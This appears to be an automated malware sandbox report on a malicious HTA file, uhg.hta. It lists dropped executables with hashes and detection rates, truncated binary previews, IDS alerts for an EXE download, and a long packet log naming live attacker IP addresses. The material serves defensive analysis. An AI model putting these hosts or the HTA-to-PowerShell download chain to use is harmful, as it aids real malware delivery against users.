                                                                                    SHA1:3C37CBB851AA2926EF455ADA228A0C3E835D4DD0
                                                                                    SHA-256:B7DE84E05980400F6021523CF18AFF9AF6A68286EDFBAA0159D6DC40788A364F
                                                                                    SHA-512:147B173A7C6B2C4C9ABD17A1FB4250F36FF72F976C263F275B87492FBC19CCCC98F293E2FA646DB085B3407FF6C1FFE012A8728EBE66825AFCD0322A2DF689C4
                                                                                    Malicious:true
                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.0.cs"

                                                                                    C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3072
                                                                                    Entropy (8bit):2.788745281749708
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:etGSjJOJK3lz8shgkhb4q8YtkZfoJryWWI+ycuZhNnWakSEHPNnqI:60Y3uc4fPJoJryd1ulWa3CqI
                                                                                    MD5:8060EEEE88668F90FDC7201FD3C8D51A
                                                                                    SHA1:E2CBF31B6475B7E754C211274754F5EFD54BD92B
                                                                                    SHA-256:93C8CFDBC9F0F7444AC615AFC9D9EB2A55037CE5B66FDB86B9160E53CC715F1A
                                                                                    SHA-512:D6D383EDF8F68AEC4431D8425D148445BF17CDFA96E9314CEA6F5D7D491FA35F0745AAED889BCD78045A754071B9B70D5E2F32D390E5CFA15CBF88419FFC52FC
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3.g...........!.................#... ...@....... ....................................@.................................L#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....e.....e...........................".............. =.....P ......O.........U.....W.....\.....`.....b...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.hb

                                                                                    C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.out

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):876
                                                                                    Entropy (8bit):5.299236204753517
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:KOuqd3ka6K2adETaMKax5DqBVKVrdFAMBJTH:yika6CdE+MK2DcVKdBJj
                                                                                    MD5:B687F9C65A4E5A56EB20357E6CF34E8C
                                                                                    SHA1:21C0EF8EB9418088AC5309282A412609FE0FD67A
                                                                                    SHA-256:092E5C8AED1ADC798386B5E9319FC470F33F690955AE23E297B63B04A24F90B0
                                                                                    SHA-512:F02C83402C9F87BAA90BA7909ED962807E260F435717188E07093065D99A7AED77DCC92E15164ACF960CB89286D12EDEB2C4471917F85CDBD921F3ADA3B0FD4D
                                                                                    Malicious:false
                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                    C:\Users\user\AppData\Roaming\csso.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):962048
                                                                                    Entropy (8bit):6.8404672126338975
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Eu6JWgXT7rKfXNeKgOIc0nAWY/ySWHDVz/Vovh7V1C0NnCGso9fgBDYga9TRmJTT:Eu6J33O0c+JY5UZ+XC0kGso6Fa5tCWY
                                                                                    MD5:724A10F0D502447504BD44AD72AA462F
                                                                                    SHA1:967CE5451BC887068A8ABFBA6CCBEDA97E452DEA
                                                                                    SHA-256:AFC0FAE5423AFEAB434D2F262D8C658D2F316C50986BFE2777E09B90D50A1971
                                                                                    SHA-512:D76FEC804B7D1BDEC53F533AB46B3A1A958F8962D98AF8A869366615429F46767558B3A7E5228A8A909FF6F682EEC42144F68A41F96108DF70A4692E311E074B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...OP.g.........."..................}............@.......................... ......@.....@...@.......@.....................L...|....p...%.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....%...p...&..................@..@.reloc...q.......r...<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:HTML document, ASCII text, with very long lines (14696), with CRLF line terminators
                                                                                    Entropy (8bit):2.297491245253929
                                                                                    TrID:
                                                                                    • HyperText Markup Language (15015/1) 100.00%
                                                                                    File name:uhg.hta
                                                                                    File size:14'864 bytes
                                                                                    MD5:179a3830db0768b766cc9375a3cf9a4c
                                                                                    SHA1:eb5290b3b563ad540db805c77b67bf49d394308e
                                                                                    SHA256:735354ae6e387cd7d7b63f2bc45f838f1218f956e278e20401b8ad606dec8488
                                                                                    SHA512:7755b6556d950a9812accbed4f643b21d77dbf631a6275e9ee01cb289290f66b28629da5067c1152e6809b6df4ec27fb079a0156db77bb1fb1466db9d50dfb5b
                                                                                    SSDEEP:96:/AbxYbDbgXYb62O5CTfSyerb2wb2EeYbEbd+:OYEXY+2OATbweYP
                                                                                    TLSH:306275240C0FBD26172791148DCF69E848DFE799A4707AEA746C8590A379BF854C0FD6
                                                                                    File Content Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<scRipT lAngUAGe="vbScriPt">..diM

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-03-13T01:18:55.126197+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1123.95.235.2880192.168.2.649694TCP
                                                                                    2025-03-13T01:18:55.217462+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2123.95.235.2880192.168.2.649694TCP
                                                                                    2025-03-13T01:19:03.185771+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649695158.101.44.24280TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 13, 2025 01:18:54.645906925 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:54.650656939 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:54.650748968 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:54.650934935 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:54.655591965 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.125833035 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.125849962 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.125858068 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.125926971 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.125933886 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.125936031 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.125941038 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.125947952 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.126051903 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.126197100 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.126204967 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.126210928 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.126295090 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.130609989 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.130626917 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.131263018 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.212645054 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.212656021 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.212673903 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.212687969 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.212694883 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.212706089 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.212713003 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.212721109 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.212738991 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.212862968 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.213143110 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.213217020 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.213223934 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.213272095 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.213294983 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.213316917 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.213382006 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.213633060 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.213633060 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.214056015 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.214062929 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.214075089 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.214219093 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.214226007 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.214312077 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.214312077 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.214838982 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.214929104 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.214931965 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.214940071 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.214991093 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.215044975 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.215118885 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.217462063 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.217468977 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.217590094 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.299443960 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299458981 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299472094 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299477100 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299484968 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299491882 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299623013 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.299623966 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.299635887 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299643040 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299655914 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299660921 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299668074 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299674988 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299700022 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.299755096 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299808979 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.299813032 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299860954 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.299911976 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299918890 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.299973011 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.300040007 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300045967 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300054073 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300057888 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300082922 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.300237894 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.300352097 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300379038 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300470114 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.300470114 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.300472021 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300478935 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300636053 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300642967 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300657988 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300664902 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300697088 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.300729990 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.300729990 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.300905943 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300949097 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.300956011 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301168919 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.301282883 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301346064 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301353931 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301491976 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.301498890 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301506042 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301512957 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301520109 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301708937 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.301770926 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301779032 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301790953 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301798105 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.301888943 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.301888943 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.302211046 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.302231073 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.302360058 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.344537020 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.344638109 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.344644070 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.344655037 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.344670057 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.344743013 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.344743013 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.385951042 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.385968924 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386010885 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386050940 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386050940 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386053085 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386101007 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386101007 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386141062 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386183977 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386195898 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386226892 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386358023 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386362076 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386369944 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386491060 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386497021 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386507988 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386523008 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386555910 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386575937 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386713982 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386719942 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386727095 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386776924 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386776924 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386825085 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386831045 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386842012 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386847973 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.386887074 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.386974096 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.387062073 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387115955 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387123108 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387207031 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.387207031 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.387276888 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387284040 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387295008 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387301922 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387495995 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.387518883 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387526035 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387608051 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387615919 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387639046 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.387767076 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387773991 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387779951 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387785912 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387795925 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.387819052 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.387820005 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.387928963 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.388154984 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388160944 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388168097 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388174057 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388179064 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388185024 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388191938 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388196945 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388283014 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.388283014 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.388572931 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388652086 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.388654947 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388662100 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388767004 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.388791084 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388797998 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388849974 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388858080 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.388906002 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.389136076 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.389142990 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389148951 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389159918 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389166117 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389175892 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389182091 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389193058 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389200926 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389224052 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.389260054 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.389260054 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.389625072 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389705896 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.389719963 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389727116 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389811993 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.389857054 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389864922 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389877081 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389883995 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.389913082 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.390120983 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390140057 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390145063 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390147924 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390151024 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390162945 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390170097 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390173912 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.390173912 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.390177011 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390196085 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.390595913 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390659094 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390666962 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390671015 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.390706062 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.390768051 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.390783072 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.390925884 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.431386948 CET804969423.95.235.28192.168.2.6
